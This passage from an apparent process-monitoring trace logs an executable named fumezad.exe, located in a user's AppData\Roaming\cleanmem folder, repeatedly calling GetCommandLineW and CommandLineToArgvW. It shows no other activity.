lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5db8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5e38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5eb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5f38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c5fb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6038*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c60b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6138*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c61b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6238*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c62b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6338*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c63b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6438*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c64b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6538*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c65b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6638*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c66b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6738*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c67b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6838*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c68b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.516] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6938*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.516] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c69b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6ab8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6b38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6bb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6c38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6cb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6d38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6db8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6e38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6eb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.517] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.517] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6f38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.531] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c6fb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.531] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7038*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.531] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c70b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.531] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7138*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.531] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c71b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.531] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7238*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.531] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.531] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c72b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7338*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c73b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7438*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c74b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7538*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c75b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7638*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c76b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7738*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c77b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7838*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c78b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7938*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c79b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7a38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7ab8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7b38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7bb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.532] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.532] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7c38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7cb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7d38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7db8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7e38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7eb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7f38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c7fb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8038*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c80b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () 